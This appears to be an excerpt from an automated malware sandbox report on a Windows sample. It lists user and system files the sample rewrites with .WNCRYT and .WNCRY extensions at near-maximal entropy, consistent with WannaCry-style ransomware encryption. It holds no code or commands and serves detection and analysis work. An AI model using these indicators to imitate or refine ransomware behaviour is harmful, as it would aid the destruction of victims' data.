                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRYT entropy: 7.99933673293Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT entropy: 7.99848498699Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRYT entropy: 7.9939302221Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT entropy: 7.99312041013Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRYT entropy: 7.99893393847Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99942155872Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRYT entropy: 7.99199540376Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db.WNCRYT entropy: 7.99935266809Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99968216973Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.9997549636Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\en-us.16\stream.x64.en-us.db.WNCRYT entropy: 7.99969614412Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\x-none.16\stream.x64.x-none.db.WNCRYT entropy: 7.99993949878Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994707584058.txt.WNCRYT entropy: 7.99867000213Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\IconCache.db.WNCRYT entropy: 7.99261037711Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994802498611.txt.WNCRYT entropy: 7.99826523596Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99186300678Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196551589314323.txt.WNCRYT entropy: 7.99812660004Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99984894849Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196551879309585.txt.WNCRYT entropy: 7.99850242464Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db.WNCRYT entropy: 7.99635513518Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20210922101724.txt.WNCRYT entropy: 7.99954170606Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20210930121453.txt.WNCRYT entropy: 7.99933041435Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT entropy: 7.99211829235Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220120085256.txt.WNCRYT entropy: 7.99928841987Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT entropy: 7.99397480397Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220223140416.txt.WNCRYT entropy: 7.99922785225Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db.WNCRYT entropy: 7.99387538406Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT entropy: 7.99982219919Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT entropy: 7.99996594205Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT entropy: 7.99990959246Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsglobals.txt.WNCRYT entropy: 7.99938086302Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT entropy: 7.99993349044Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appssynonyms.txt.WNCRYT entropy: 7.99919467739Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT entropy: 7.99706578748Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210922101725.txt.WNCRYT entropy: 7.99622697506Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT entropy: 7.99979484399Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210930121453.txt.WNCRYT entropy: 7.99326540145Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT entropy: 7.99983788998Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20220223140416.txt.WNCRYT entropy: 7.99168479545Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT entropy: 7.99983697161Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{435eadfa-ef29-450c-8859-49b8fff38e28}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99469305537Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT entropy: 7.99981512534Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{88c217c2-58f8-476c-acc3-37a9546e81a8}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.9954522702Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT entropy: 7.99995005316Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99528319046Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT entropy: 7.99303790466Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsconversions.txt.WNCRYT entropy: 7.99985256158Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT entropy: 7.99980934058Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsconversions.txt.WNCRYT entropy: 7.9996594959Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\36378e77.png.WNCRYT entropy: 7.99215008228Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsglobals.txt.WNCRYT entropy: 7.99498846899Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\ActivitiesCache.db.WNCRYT entropy: 7.99982444207Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingssynonyms.txt.WNCRYT entropy: 7.99794267858Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99911564973Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT entropy: 7.9924890808Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99911828828Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt.WNCRYT entropy: 7.99912612001Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99989332901Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt.WNCRYT entropy: 7.99383164618Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT entropy: 7.99992709793Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt.WNCRYT entropy: 7.99923155964Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt.WNCRYT entropy: 7.99642776079Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt.WNCRYT entropy: 7.99862580759Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Desktop\s.wnry entropy: 7.998263053Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Desktop\t.wnry entropy: 7.99727613788Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_16[1].txt.WNCRYT entropy: 7.9979534592Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_18[1].txt.WNCRYT entropy: 7.99842420769Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_19[1].txt.WNCRYT entropy: 7.99847497327Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_20[1].txt.WNCRYT entropy: 7.99703331127Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_21[1].txt.WNCRYT entropy: 7.99590248062Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_22[1].txt.WNCRYT entropy: 7.99903385181Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_24[1].txt.WNCRYT entropy: 7.99562141231Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_25[1].txt.WNCRYT entropy: 7.99477062458Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_26[1].txt.WNCRYT entropy: 7.99978888346Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRYT entropy: 7.99819585174Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_28[1].txt.WNCRYT entropy: 7.99898605841Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_2[1].txt.WNCRYT entropy: 7.99733937527Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_4[1].txt.WNCRYT entropy: 7.9911145004Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_6[1].txt.WNCRYT entropy: 7.99458754298Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy) entropy: 7.99958793169Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRY (copy) entropy: 7.99910140145Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRY (copy) entropy: 7.99779266292Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRY (copy) entropy: 7.99933673293Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRY (copy) entropy: 7.9939302221Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRY (copy) entropy: 7.99893393847Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRY (copy) entropy: 7.99199540376Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy) entropy: 7.9997549636Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994707584058.txt.WNCRY (copy) entropy: 7.99867000213Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994802498611.txt.WNCRY (copy) entropy: 7.99826523596Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196551589314323.txt.WNCRY (copy) entropy: 7.99812660004Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196551879309585.txt.WNCRY (copy) entropy: 7.99850242464Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20210922101724.txt.WNCRY (copy) entropy: 7.99954170606Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20210930121453.txt.WNCRY (copy) entropy: 7.99933041435Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220120085256.txt.WNCRY (copy) entropy: 7.99928841987Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220223140416.txt.WNCRY (copy) entropy: 7.99922785225Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsglobals.txt.WNCRY (copy) entropy: 7.99938086302Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appssynonyms.txt.WNCRY (copy) entropy: 7.99919467739Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210922101725.txt.WNCRY (copy) entropy: 7.99622697506Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210930121453.txt.WNCRY (copy) entropy: 7.99326540145Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20220223140416.txt.WNCRY (copy) entropy: 7.99168479545Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{435eadfa-ef29-450c-8859-49b8fff38e28}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99469305537Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{88c217c2-58f8-476c-acc3-37a9546e81a8}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.9954522702Jump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99528319046Jump to dropped file
